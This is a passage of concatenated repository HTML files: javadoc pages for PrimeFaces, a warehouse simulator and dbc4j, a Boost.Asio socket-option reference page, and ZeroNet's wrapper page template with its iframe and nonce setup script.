CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/component/selectonelistbox/SelectOneListbox.html" title="class in org.primefaces.component.selectonelistbox"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/component/selectonelistbox//class-useSelectOneListbox.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="SelectOneListbox.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2012. All Rights Reserved. </BODY> </HTML>
doc/alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html
eshen1991/kivasim
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0) on Tue Apr 10 16:02:14 GMT-05:00 2007 --> <TITLE> BucketbotManagerExample.LetterWordStationPair </TITLE> <META NAME="date" CONTENT="2007-04-10"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="BucketbotManagerExample.LetterWordStationPair"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/BucketbotManagerExample.LetterWordStationPair.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterLetterStationPair.html" title="class in alphabetsoup.simulators.precomputed"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../alphabetsoup/simulators/precomputed/ExternalConfigurationGenerator.html" title="class in alphabetsoup.simulators.precomputed"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="BucketbotManagerExample.LetterWordStationPair.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> alphabetsoup.simulators.precomputed</FONT> <BR> Class BucketbotManagerExample.LetterWordStationPair</H2> <PRE> java.lang.Object <IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>alphabetsoup.simulators.precomputed.BucketbotManagerExample.LetterWordStationPair</B> </PRE> <DL> <DT><B>Enclosing class:</B><DD><A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.html" title="class in alphabetsoup.simulators.precomputed">BucketbotManagerExample</A></DD> </DL> <HR> <DL> <DT><PRE>public static class <B>BucketbotManagerExample.LetterWordStationPair</B><DT>extends java.lang.Object</DL> </PRE> <P> <HR> <P> <!-- =========== FIELD SUMMARY =========== --> <A NAME="field_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Field Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../alphabetsoup/framework/Letter.html" title="class in alphabetsoup.framework">Letter</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html#letter">letter</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../alphabetsoup/framework/WordStation.html" title="interface in alphabetsoup.framework">WordStation</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html#station">station</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ======== CONSTRUCTOR SUMMARY ======== --> <A NAME="constructor_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Constructor Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html#BucketbotManagerExample.LetterWordStationPair(alphabetsoup.framework.Letter, alphabetsoup.framework.WordStation)">BucketbotManagerExample.LetterWordStationPair</A></B>(<A HREF="../../../alphabetsoup/framework/Letter.html" title="class in alphabetsoup.framework">Letter</A>&nbsp;l, <A HREF="../../../alphabetsoup/framework/WordStation.html" title="interface in alphabetsoup.framework">WordStation</A>&nbsp;s)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ============ FIELD DETAIL =========== --> <A NAME="field_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Field Detail</B></FONT></TH> </TR> </TABLE> <A NAME="letter"><!-- --></A><H3> letter</H3> <PRE> public <A HREF="../../../alphabetsoup/framework/Letter.html" title="class in alphabetsoup.framework">Letter</A> <B>letter</B></PRE> <DL> <DL> </DL> </DL> <HR> <A NAME="station"><!-- --></A><H3> station</H3> <PRE> public <A HREF="../../../alphabetsoup/framework/WordStation.html" title="interface in alphabetsoup.framework">WordStation</A> <B>station</B></PRE> <DL> <DL> </DL> </DL> <!-- ========= CONSTRUCTOR DETAIL ======== --> <A NAME="constructor_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Constructor Detail</B></FONT></TH> </TR> </TABLE> <A NAME="BucketbotManagerExample.LetterWordStationPair(alphabetsoup.framework.Letter, alphabetsoup.framework.WordStation)"><!-- --></A><H3> BucketbotManagerExample.LetterWordStationPair</H3> <PRE> public <B>BucketbotManagerExample.LetterWordStationPair</B>(<A HREF="../../../alphabetsoup/framework/Letter.html" title="class in alphabetsoup.framework">Letter</A>&nbsp;l, <A HREF="../../../alphabetsoup/framework/WordStation.html" title="interface in alphabetsoup.framework">WordStation</A>&nbsp;s)</PRE> <DL> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/BucketbotManagerExample.LetterWordStationPair.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterLetterStationPair.html" title="class in alphabetsoup.simulators.precomputed"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../alphabetsoup/simulators/precomputed/ExternalConfigurationGenerator.html" title="class in alphabetsoup.simulators.precomputed"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?alphabetsoup/simulators/precomputed/BucketbotManagerExample.LetterWordStationPair.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="BucketbotManagerExample.LetterWordStationPair.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
coflo-0.0.4/third_party/boost_1_48_0/doc/html/boost_asio/reference/basic_stream_socket/receive_low_watermark.html
charlesDGY/coflo
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>basic_stream_socket::receive_low_watermark</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../basic_stream_socket.html" title="basic_stream_socket"> <link rel="prev" href="receive_buffer_size.html" title="basic_stream_socket::receive_buffer_size"> <link rel="next" href="remote_endpoint.html" title="basic_stream_socket::remote_endpoint"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td> <td align="center"><a href="../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="receive_buffer_size.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_stream_socket.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="remote_endpoint.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.reference.basic_stream_socket.receive_low_watermark"></a><a class="link" href="receive_low_watermark.html" title="basic_stream_socket::receive_low_watermark">basic_stream_socket::receive_low_watermark</a> </h4></div></div></div> <p> <span class="emphasis"><em>Inherited from socket_base.</em></span> </p> <p> <a class="indexterm" name="id1225581"></a> Socket option for the receive low watermark. </p> <pre class="programlisting"><span class="keyword">typedef</span> <span class="identifier">implementation_defined</span> <span class="identifier">receive_low_watermark</span><span class="special">;</span> </pre> <p> Implements the SOL_SOCKET/SO_RCVLOWAT socket option. </p> <h6> <a name="boost_asio.reference.basic_stream_socket.receive_low_watermark.h0"></a> <span><a name="boost_asio.reference.basic_stream_socket.receive_low_watermark.examples"></a></span><a class="link" href="receive_low_watermark.html#boost_asio.reference.basic_stream_socket.receive_low_watermark.examples">Examples</a> </h6> <p> Setting the option: </p> <pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">tcp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span> <span class="special">...</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">socket_base</span><span class="special">::</span><span class="identifier">receive_low_watermark</span> <span class="identifier">option</span><span class="special">(</span><span class="number">1024</span><span class="special">);</span> <span class="identifier">socket</span><span class="special">.</span><span class="identifier">set_option</span><span class="special">(</span><span class="identifier">option</span><span class="special">);</span> </pre> <p> Getting the current option value: </p> <pre class="programlisting"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">ip</span><span class="special">::</span><span class="identifier">tcp</span><span class="special">::</span><span class="identifier">socket</span> <span class="identifier">socket</span><span class="special">(</span><span class="identifier">io_service</span><span class="special">);</span> <span class="special">...</span> <span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">socket_base</span><span class="special">::</span><span class="identifier">receive_low_watermark</span> <span class="identifier">option</span><span class="special">;</span> <span class="identifier">socket</span><span class="special">.</span><span class="identifier">get_option</span><span class="special">(</span><span class="identifier">option</span><span class="special">);</span> <span class="keyword">int</span> <span class="identifier">size</span> <span class="special">=</span> <span class="identifier">option</span><span class="special">.</span><span class="identifier">value</span><span class="special">();</span> </pre> <h6> <a name="boost_asio.reference.basic_stream_socket.receive_low_watermark.h1"></a> <span><a name="boost_asio.reference.basic_stream_socket.receive_low_watermark.requirements"></a></span><a class="link" href="receive_low_watermark.html#boost_asio.reference.basic_stream_socket.receive_low_watermark.requirements">Requirements</a> </h6> <p> <span class="bold"><strong>Header: </strong></span><code class="literal">boost/asio/basic_stream_socket.hpp</code> </p> <p> <span class="bold"><strong>Convenience header: </strong></span><code class="literal">boost/asio.hpp</code> </p> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003-2011 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="receive_buffer_size.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_stream_socket.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="remote_endpoint.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
src/Ui/template/wrapper.html
mishfit/ZeroNet
<!DOCTYPE html> <html> <head> <title>{title} - ZeroNet</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="/uimedia/all.css?rev={rev}" /> {meta_tags} </head> <body style="{body_style}" class="{themeclass}"> <noscript> <div class="unsupported"><h3>ZeroNet requires JavaScript support.</h3>If you use NoScript: Click on toolbar icon and choose the "Temporary allow all this page" option.</div> </noscript> <script nonce="{script_nonce}"> // If we are inside iframe escape from it if (window.self !== window.top) { window.open(window.location.toString().replace(/([&?])wrapper=False/, "$1").replace(/&$/, "").replace(/[&?]wrapper_nonce=[A-Za-z0-9]+/, ""), "_top"); document.write("Escaping from iframe..."); window.stop(); document.execCommand("Stop", false); } // We are opened as a parent-window else if (window.opener && window.opener.location.toString()) { document.write("Opened as child-window, stopping..."); window.stop(); document.execCommand("Stop", false); } </script> <div class="progressbar"> <div class="peg"></div> </div> <!-- Fixed button --> <div class='fixbutton'> <div class='fixbutton-text'><img width=22 src='/uimedia/img/logo-white.png'/></div> <div class='fixbutton-burger'>&#x2261;</div> <a class='fixbutton-bg' href="{homepage}/"></a> </div> <!-- Notifications --> <div class='notifications'> <div class='notification template'><span class='notification-icon'>!</span> <span class='body'>Test notification</span><a class="close" href="#Close">&times;</a><div style="clear: both"></div></div> </div> <!-- Loadingscreen --> <div class='loadingscreen'> <a href="/Config" class="loading-config">Config</a> <div class='loading-text console'> </div> <div class="flipper-container"> <div class="flipper"> <div class="front"></div><div class="back"></div> </div> </div> </div> <!-- Site Iframe --> <iframe src='about:blank' id='inner-iframe' sandbox="allow-forms allow-scripts allow-top-navigation allow-popups allow-modals allow-presentation {sandbox_permissions}" allowfullscreen="true" webkitallowfullscreen="true" mozallowfullscreen="true" oallowfullscreen="true" msallowfullscreen="true"></iframe> <!-- Site info --> <script id="script_init" nonce="{script_nonce}"> document.getElementById("inner-iframe").src = "{file_url}{query_string}" address = "{address}" wrapper_nonce = "{wrapper_nonce}" wrapper_key = "{wrapper_key}" ajax_key = "{ajax_key}" postmessage_nonce_security = {postmessage_nonce_security} file_inner_path = "{file_inner_path}" permissions = {permissions} show_loadingscreen = {show_loadingscreen} server_url = '{server_url}' script_nonce = '{script_nonce}' if (typeof WebSocket === "undefined") { tag = document.createElement('div'); tag.innerHTML += "<div class='unsupported'>Your browser does not support <a href='https://caniuse.com/#search=websocket'>WebSocket connections</a>.<br>Please use the latest <a href='http://outdatedbrowser.com'>Chrome or Firefox</a> browser.</div>"; document.body.appendChild(tag) } </script> <script type="text/javascript" src="/uimedia/all.js?rev={rev}&lang={lang}" nonce="{script_nonce}"></script> <script nonce="{script_nonce}">setTimeout(window.wrapper.onWrapperLoad, 1)</script> </body> </html>
javadocs/pt/unl/fct/di/dbc4j/examples/class-use/Queue.html
sergiofagostinho/dbc4j
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.5.0_06) on Fri Nov 30 18:29:54 WET 2007 --> <TITLE> Uses of Class pt.unl.fct.di.dbc4j.examples.Queue </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { parent.document.title="Uses of Class pt.unl.fct.di.dbc4j.examples.Queue"; } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?pt/unl/fct/di/dbc4j/examples//class-useQueue.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Queue.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>pt.unl.fct.di.dbc4j.examples.Queue</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples">Queue</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A 